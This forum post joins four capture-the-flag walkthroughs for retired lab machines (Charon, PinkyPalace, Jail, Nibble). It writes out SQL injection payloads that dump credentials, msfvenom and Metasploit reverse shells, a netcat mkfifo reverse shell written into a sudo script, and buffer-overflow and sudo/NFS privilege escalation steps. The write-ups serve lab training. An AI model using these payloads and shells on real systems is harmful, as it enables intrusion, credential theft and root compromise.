Login

**NINZA** · 05-14-2020, 09:06 AM

0			0

Hello friends!! Today we are going to solve another CTF challenge “Charon” which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.31 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.31
1
nmap -sV 10.10.10.31
[Image: 1.png?w=687]

From given below image, you can observe we found port 22 and 80 are open on target system.
As port 80 is running http server we open the target machine’s ip address in our browser.
[Image: 2.png?w=687]

We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.
[Image: 3.png?w=687]

We open the link, and are presented with a login page.
[Image: 4.png?w=687]

We don’t find anything on the login page, so we go to forgot password link.
[Image: 5.png?w=687]

We capture the request of the page using burpsuite, and send it to repeater.
[Image: 6.png?w=687]

After sending the request to repeater, we try to enumerate if the site is vulnerable to SQL-injection. As soon as we add a quote at the end of our email id we get a database error.
[Image: 7.png?w=687]

Now to confirm that the site is vulnerable to SQL-injection we use “– – “to comment the query and remove the error.
[Image: 8.png?w=687]

Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find the number of columns, to check the number of columns we use “ORDER BY” command to find the number of columns in the table. After find the number of columns we use “UNION SELECT” command to give the output column names with the respective numbers. As UNION and union is blacklisted, we use UNion for SQL-injection.
‘UNion SELECT 1,2,3,4 — –
[Image: 9.png?w=687]

We couldn’t run any commands in columns, but when we pass a string in column 4, we successfully ran our query.
[Image: 10.png?w=687]

Now we know how bypass the security using string, we first find the name of the database
' UNion select 1,2,3,concat(database(), "@who.ami") -- -
1
' UNion select 1,2,3,concat(database(), "@who.ami") -- -
[Image: 11.png?w=687]

After finding the name of the database we find the table name in the database.
' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 1,1 -- -
1
' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 1,1 -- -
[Image: 12.png?w=687]

Enumerating the tables in the database; we find two tables, one called license and another one called operators.
' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 2,1 -- -
1
' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 2,1 -- -
[Image: 13.png?w=687]

After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 1,1 -- -
1
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 1,1 -- -
[Image: 14.png?w=687]

After getting the “__username_” column we enumerate further and get a column called “__password_”.
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 2,1 -- -
1
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 2,1 -- -
[Image: 15.png?w=687]

Now we dump the column name “__username_”.
' UNion select 1,2,3,concat(__username_, "@who.ami") FROM operators limit 1,1 -- -
1
' UNion select 1,2,3,concat(__username_, "@who.ami") FROM operators limit 1,1 -- -
[Image: 16.png?w=687]

Now we dump the column name “__password_” for the username = “super_cms_adm”.
' UNion select 1,2,3,concat(__password_, “@who.ami”) FROM operators limit 1,1 -- -
1
' UNion select 1,2,3,concat(__password_, “@who.ami”) FROM operators limit 1,1 -- -
[Image: 17.png?w=687]

When we dump the “__password_” column we get a hash. We use hashkiller.co.uk to crack the password.
[Image: 18.png?w=687]

Now we got the credentials for the supercms login page, super_cms_adm:tamarro.
[Image: charon.png?w=687&ssl=1]

Now login using the above credentials, we were able to get a page where there is an option for uploading image.
[Image: 20.png?w=687]

Now we open the link and find an upload page.
[Image: 21.png?w=687]

We take a look at the source page and find a base64 encoded string.
[Image: 22.png?w=687]

When we decode it we find a string called “testfile1”. It is possible that there is hidden field with this name.
[Image: 23.png?w=687]

Now we create a php payload using msfvenom, so that we can upload our php shell.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.7 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.7 lport=4444 -f raw
[Image: 24.png?w=687]

We capture the upload request and create a new field and add “file.php”.
[Image: 25.png?w=687]

Now we get the link the location of the file we just uploaded in /images/.
[Image: 26.png?w=687]

Before running our shell, we setup our listener using metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.7
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.7
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
[Image: 27.png?w=687]

As soon as we open the link to our shell, we get our reverse shell.
meterpreter > sysinfo
[Image: 28.png?w=687]

Now enumerating through the system we find an encrytpted file and a public key inside /home/decoder directory.
[Image: 30.png?w=687]

We download both the files into our system.
meterpreter > download decoder.pub /root/Desktop
meterpreter > download pass.crypt /root/Desktop
1
2
meterpreter > download decoder.pub /root/Desktop
meterpreter > download pass.crypt /root/Desktop
[Image: 31.png?w=687]

Now we decode the encrypted file using public key with the RsaCtfTool.
./RsaCtfTool.py --publickey /root/Desktop/decoder.pub –uncipherfile /root/Desktop/pass.crypt
1
./RsaCtfTool.py --publickey /root/Desktop/decoder.pub –uncipherfile /root/Desktop/pass.crypt
[Image: 34.png?w=687]

We use ssh to login using the credentials, decoder:nevermindthebollocks.
ssh [email protected]
1
ssh [email protected]
[Image: 35.png?w=687]

After logging in we find a file called user.txt, we open the file and find our first flag.
[Image: 36.png?w=687]

Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/ directory.
find / -perm -4000 2>/dev/null
1
find / -perm -4000 2>/dev/null
[Image: 37.png?w=687]

When we run the binary we find that we can run any shell command using this binary. We use this to open root.txt inside /root/ directory. When we open root.txt we find our final flag.
supershell "/bin/ls$
> cat /root/root.txt"
1
2
supershell "/bin/ls$
> cat /root/root.txt"
[Image: 38.png?w=687]

Hello friends! Today we are going to take another boot2root challenge known as PinkyPalace. The credit for making this vm machine goes to “Pink_panther” and it is another boot to root challenge in which our goal is to gain root access to complete the challenge. You can download this VM

[To see content please register here]

.
Let’s Breach!!!
Let’s do an nmap scan for port enumeration.
nmap -sV -p- 192.168.1.137
1
nmap -sV -p- 192.168.1.137
[Image: 1.png?w=687&ssl=1]

Nmap scan shows us the following ports are open and the corresponding services are running:
nginx web server on port 8080
a squid proxy on port 31337
a ssh daemon on port 64666
As port 8080 is running nginx, we try to enumerate the webserver but it returns a 403 forbidden code.
[Image: 2.png?w=687&ssl=1]

Now we know that the target machine is running squid server so we try to parse any request that go through it. We use foxyproxy addon to setup a proxy connection in our browser.
[Image: 3.png?w=687&ssl=1]

After setting up our proxy we try to open the webserver, we find that the server is probably configured to allow access from localhost. As when we try to access it via server’s IP address we still get a forbidden response.
[Image: 4.png?w=687&ssl=1]

We enumerate the directories by pivoting our connection through the squid proxy and find a directory called littlesecretes-main/.
dirb

[To see content please register here]

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.1.137:31337
1
dirb

[To see content please register here]

/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.1.137:31337
[Image: 5.png?w=687&ssl=1]

We open the link that was discovered by the dirb scan, it opens up a page that asks for username and password. We tried to check for sql injection using sqlmap and find that the page is vulnerable to sql injection.
[Image: 6.png?w=687&ssl=1]

Now we enumerate the users and password using sqlmap and find 2 users and the hashes of there password.
sqlmap --proxy=http://192.168.1.137:31337 –data="user=hacking&pass=articles&submit=Login" -u

[To see content please register here]

--level=5 --risk=3 --dump users
1
sqlmap --proxy=http://192.168.1.137:31337 –data="user=hacking&pass=articles&submit=Login" -u

[To see content please register here]

--level=5 --risk=3 --dump users
[Image: 7.png?w=687&ssl=1]

We use the site

[To see content please register here]

to decrypt the hash we found in the sqlmap dump. The password for the user pinkymage was decrypted.
[Image: 8.png?w=687&ssl=1]

We were unable to login through the web server using these credentials. So we used them to login through ssh.
ssh [email protected] -p64666
1
ssh [email protected] -p64666
[Image: 9.png?w=687&ssl=1]

While enumerating the target machine we find a file called “note.txt” in /var/www/html/littlesecrets-main/ultrasecretadminf1l35/, we open the open and find a hint to search for RSA key. We tried to search for hidden files in the directory and find a hidden file called “.ultrasecret”.
[Image: 10.png?w=687&ssl=1]

When we take a look at the content of the hidden file; we find a base64 encoded string and when we decrypted it we find that it was a RSA Key.
[Image: 11.png?w=687&ssl=1]

We tried to decrypt and save the file in the current directory but we don’t have write permissions for the directory. So we decrypt the hidden file and save it in our home directory of user pinkymanage as id_rsa.
[Image: 12.png?w=687&ssl=1]

Now we move to the home directory for the user pinkymanage and give the RSA key its appropriate permissions. Then we login as user pinky through ssh.
chmod 600 id_rsa
ssh -i id_rsa pinky@localhost -p64666
1
2
chmod 600 id_rsa
ssh -i id_rsa pinky@localhost -p64666
[Image: 13.png?w=687&ssl=1]

After logging in as pinky we find two files one executable with suid bit set called “adminhelper” and another text file called “note.txt”. We open the note.txt and find
[Image: 14.png?w=687&ssl=1]

Now we download the file to our system using base64 to convert the hex strings in the file into base64 encrypted strings
[Image: 15.png?w=687&ssl=1]

Now we decrypt the file into our system as save it as file admin.
[Image: 16.png?w=687&ssl=1]

We open the file in our sytem and find a strcpy function in line main+42; as strcpy is vulnerable to buffer overflow. We will try to exploit this vulnerability.
[Image: 17.png?w=687&ssl=1]

To exploit buffer overflow, first we need to overwrite the adjacent memory locations and find the EIP offset. We use pattern_create.rb script to generate a 78 bytes long string.
./pattern_create.rb -l 78
1
./pattern_create.rb -l 78
[Image: 19.png?w=687&ssl=1]

Now we run the file with the string we generated as our argument and find that we were able to overwrite the EIP.
[Image: 20.png?w=687&ssl=1]

To find the EIP offset we used the pattern_offset command, and find the EIP offset to be 72.
./pattern_offset.rb -q 356341346341 -l 78
1
./pattern_offset.rb -q 356341346341 -l 78
[Image: 21.png?w=687&ssl=1]

There are no binary defences like NX or ASLR but there is PIE. So we can’t use the ROP tricks, but we can use Shellcode Injection. We overwrite the EIP with the address of our shellcode which was stored in the kernel environment. This spawns a tty shell as root user.
[Image: 22.png?w=687&ssl=1]

Now we move to root directory and find a file called “root.txt” inside it. We take a look at the content of the file and find the congratulatory flag.
[Image: 23.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another CTF challenge “Jail” which is available online for those who want to increase their skill in penetration testing and black box testing. Jail is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.34 so let’s begin with nmap port enumeration.
nmap -sV –p- 10.10.10.34 --open
1
nmap -sV –p- 10.10.10.34 --open
[Image: 1.png?w=687&ssl=1]

From given below image, you can observe we found port 22 and 80 are open on target system.
As port 80 is running http server we open the target machine’s ip address in our browser, and find an ascii art of prison cell on the webpage.
[Image: 2.png?w=687&ssl=1]

We run dirbuster on port 80, which reveals a directory entitled jailuser/, with a folder called dev/ inside the directory.
[Image: 3.png?w=687&ssl=1]

Inside the folder we see three files; a binary file, a c-program, and a bash script.
[Image: 4.png?w=687&ssl=1]

We open the c-program and find that it is a program for some kind of authentication. We also find that it uses strcpy function for the variable password.
[Image: 5.png?w=687&ssl=1]

We download the rest of the files, in the bash script there are just a few commands for a service called jail and by checking the jail binary we find that it is an ELF file.
[Image: 6.png?w=687&ssl=1]

Now we give the binary executable permissions and run the binary.
[Image: 7.png?w=687&ssl=1]

We check netstat and find that it opens up a port 7411. We check the nmap scan and find that port 7411 is open in the target machine.
[Image: 8.png?w=687&ssl=1]

Now we open the binary in gdb to look at the assembly code. The binary works by forking itself to each server call, so in the event of a crash the primary process will still run. We use the command below in gdb to make the process debug in forked process.
gdb -q jail
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) run
1
2
3
4
gdb -q jail
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) run
[Image: 9.png?w=687&ssl=1]

First we create a 50 bytes long string to find the EIP offset using patter_create script.
./pattern_create –l 50
[Image: 10.png?w=687&ssl=1]

Now we connect to the binary running on our system using netcat. We check the c program we found earlier to find the functions we need to use.
We know from the c-program that there is a strcpy function that copies the content of a variable called password to a variable called username. Now we use the pattern we created earlier and send it as password variable. We use the DEBUG function of the binary to get the address of the stack pointer.
nc localhost 7411
USER admin
DEBUG
PASS {pattern}
1
2
3
4
nc localhost 7411
USER admin
DEBUG
PASS {pattern}
[Image: 11.png?w=687&ssl=1]

As soon as we pass the string we get a segmentation fault and find that the EIP register was overwritten with 0x62413961.
[Image: 12.png?w=687&ssl=1]

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of28. So we need to write 28 characters and then write the address of the instructions we want to be executed.
./pattern_offset.rb -q 62413961 -l 50
1
./pattern_offset.rb -q 62413961 -l 50
[Image: 13.png?w=687&ssl=1]

The off-set is 28 now we can proceed to create our python exploit using the available data to gain a shell. You can download the exploit used in the machine from

[To see content please register here]

. After running the exploit we get a shell as user “nobody”.
[Image: 14.png?w=687&ssl=1]

Now for privilege escalation, we know that the machine is running NFS share we try to exploit it. We first find the shared folders of the target machine.
showmount -e 10.10.10.34
[Image: 15.png?w=687&ssl=1]

After finding the shared folders we mount them locally. After mounting the shared folder we find that only root user has read, write and execute permissions but a user with GID 1000 can write and execute files inside the folder.
[Image: 16.png?w=687&ssl=1]

So we create a user with GID 1000, so that we can upload our shell to exploit this weak permission vulnerability.
[Image: 18.png?w=687&ssl=1]

We login as user frank and create a c-program inside the shared folder that can set the real and effective user id to be 1000 of the calling the process.
[Image: 19.png?w=687&ssl=1]

Then we compile the program set the suid bit, so that we can spawn a shell with EUID 1000.
[Image: 20.png?w=687&ssl=1]

Now we go back to our reverse shell and run the binary that we just created. As soon as we run binary we spawn a shell as user “frank”.
[Image: 21.png?w=687&ssl=1]

We spawn a TTY shell and take a look at the sudoers list. We find that we can open jail.c file in /var/www/html/jailuser with rvim as user adm with no password.
python -c "import pty;pty.spawn(‘/bin/bash’)"
sudo -l
1
2
python -c "import pty;pty.spawn(‘/bin/bash’)"
sudo -l
[Image: 22.png?w=687&ssl=1]

Before running the command we find in the sudoers list, first we go to /home/frank directory and find a file called “user.txt”. We take a look at the content of the file and find our first flag.
[Image: 23.png?w=687&ssl=1]

Now we run the 2nd command we find in the sudoers list. Now we use rvim to spawn a shell, as rvim is running as user adm when we spawn a shell we will get a shell as user adm.
[Image: 24.png?w=687&ssl=1]

Inside adm’s home directory we find a hidden folder called “.keys”. We go inside the directory and find one rar file called “keys.rar”, and one text file called “note.txt”.
[Image: 25.png?w=687&ssl=1]

We take a look at the content of note.txt file and find a hint for a password that states that the password would be user Frank’s last name followed by 4 digits and a symbol.
[Image: 26.png?w=687&ssl=1]

Now when we try to look for hidden directories, we find another folder called “.local”, we go inside that directory and find a hidden file called “.frank”.
[Image: 27.png?w=687&ssl=1]

We open the file and find it that the content of the file is encrypted.
[Image: 28.png?w=687&ssl=1]

We use the site

[To see content please register here]

and find the decrypted text; it was related to someone escaping Alcatraz.
[Image: 29.png?w=687&ssl=1]

Now we want to send keys.rar file from the target machine to our system. We first convert the content of keys.rar to base64 enoding, so that there are no bad characters.
[Image: 30.png?w=687&ssl=1]

Now we recreate the file by decoding the string in our local system.
[Image: 31.png?w=687&ssl=1]

When we try to extract the rar file we are asked for a password.
unrar x keys.rar
[Image: 32.png?w=687&ssl=1]

Now from the earlier hint we try to google search “frank Alcatraz” and find that there was a guy called Frank Miller who escaped Alcatraz prison in 1962.
[Image: 33.png?w=687&ssl=1]

We know that there was a message from the administrator to frank that his password is his last name followed by 4 digits and 1 symbol. We use crunch to create a dictionary with this information, we assume the number to be 1962 as it was the year Frank Miller escaped and it fits the 4 digit number in his password.
crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
1
crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
After creating a wordlist, we use rar2john utility to convert keys.rar into a format suitable for use with john the ripper.
rar2john keys.rar > jail
1
rar2john keys.rar > jail
[Image: 34.png?w=687&ssl=1]

We find the password to “Morris1962!” after we ran john the ripper to find the password for the rar file using the word list we created using crunch.
[Image: 35.png?w=687&ssl=1]

Now we extract the file using the password we find earlier and find a public key.
[Image: 37.png?w=687&ssl=1]

We use rsactftool to convert the public key into private key so that we can use this to login through ssh. After getting the private key; we change the permission of the private key to read write for owner only. You can download the RsaCtfTool

[To see content please register here]

.
python RsaCtfTool.py --publickey /root/rootauthorizedsshkey.pub –private > /root/id_rsa
1
python RsaCtfTool.py --publickey /root/rootauthorizedsshkey.pub –private > /root/id_rsa
[Image: 38.png?w=687&ssl=1]

We use the ssh private key to login into the target machine; once we connected through ssh we were login as root user we check the content for home directory of root and find a file called “root.txt”. We check inside the file and find our second and final flag.
ssh -i id_rsa 10.10.10.34
1
ssh -i id_rsa 10.10.10.34
[Image: 39.png?w=687&ssl=1]

Today we are going to solve another CTF challenge “Nibble” which is categories as retired lab presented by Hack the Box for making online penetration practices.
Level: Easy
Task: find user.txt and root.txt file on the victim’s machine.
Penetration Methodology
Scanning

Open ports and running services (Nmap)

Enumeration

Nibbleblog-CMS

Exploit NibbleBlog 4.0.3

Code Execution by uploading the PHP file (Metasploit)
Get User.txt

Privilege Escalation

Get root.txt

Walkthrough
Since these labs are online accessible therefore they have static IP. The IP of Nibble is 10.10.10.75 so let’s initiate with nmap port enumeration.
nmap -A 10.10.10.75
1
nmap -A 10.10.10.75
As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.
[Image: 1.png?w=687&ssl=1]

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by the following page.
[Image: 2.png?w=687&ssl=1]

Then we use curl to send http request on

[To see content please register here]

and notice /nibbleblog/ which could be any web directory.
[Image: 3.png?w=687&ssl=1]

So we execute the

[To see content please register here]

directory put us on the main page of a blogging platform NibbleBlog Yum Yum. Without wasting time search for the exploit in the Google and Rapid 7 link for its exploitation.
[Image: 4.png?w=687&ssl=1]

So we load the Metasploit framework and executed following command to take a meterpreter session of victim’s VM.
According to this module, Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
use exploit/multi/http/nibbleblog_file_upload
msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
msf exploit(multi/http/nibbleblog_file_upload) > set username admin
msf exploit(multi/http/nibbleblog_file_upload) > set password nibbles
msf exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
msf exploit(multi/http/nibbleblog_file_upload) > exploit
1
2
3
4
5
6
use exploit/multi/http/nibbleblog_file_upload
msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75
msf exploit(multi/http/nibbleblog_file_upload) > set username admin
msf exploit(multi/http/nibbleblog_file_upload) > set password nibbles
msf exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog
msf exploit(multi/http/nibbleblog_file_upload) > exploit
From given below image you can observe meterpreter session 1 opened for accessing victim tty shell.
Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it. I found the 1st flag “user.txt” from inside /home/nibbler.
cd /home
cd /nibbler
cat user.txt
1
2
3
cd /home
cd /nibbler
cat user.txt
[Image: 6.png?w=687&ssl=1]

For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside the meterpreter shell.
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls
1
2
3
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls
Inside /nibbler there was a zip file so we try to unzip it with help of the following command and after extracting zip file we got a directory “personal”, so we get inside it, then with a little more efforts found a script monitor.sh.
unzip personal.zip
cd personal
ls
cd stuff
ls -al
1
2
3
4
5
unzip personal.zip
cd personal
ls
cd stuff
ls -al
[Image: 7.png?w=687&ssl=1]

Then I check sudo rights for user “nibbler” and notice nibbler has sudo permission for script monitor.sh which means he is authorized to modify this script.
[Image: 8.png?w=687&ssl=1]

So in a new terminal, we generated a payload for netcat shell with help of msfvenom command as shown and copied the highlighted code and start netcat listener too.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.25 lport=5555 R
nc -lvp 5555
1
2
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.25 lport=5555 R
nc -lvp 5555
[Image: 9.png?w=687&ssl=1]

Then to it exploit it we move inside following Path: /home/nibbler/personal/stuff/ and paste the above-copied code inside monitor.sh as shown below
cd /home/nibbler/personal/stuff/
echo "mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0</tmp/jswwrii | /bin/sh >/tmp/jswwrii 2>&1; rm /tmp/jswwrii" > monitor.sh
1
2
cd /home/nibbler/personal/stuff/
echo "mkfifo /tmp/jswwrii; nc 10.10.14.25 5555 0</tmp/jswwrii | /bin/sh >/tmp/jswwrii 2>&1; rm /tmp/jswwrii" > monitor.sh
Since we knew monitor.sh has full permission, so we can run it to obtain reverse shell along root access.
[Image: 10.png?w=687&ssl=1]

On other, we have a netcat listener, which has provided root access to us. Let’s finish this task and grab the root.txt file………………………………..
id
cd /root
ls
root.txt
cat root.txt
1
2
3
4
5
id
cd /root
ls
root.txt
cat root.txt
[Image: 11.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis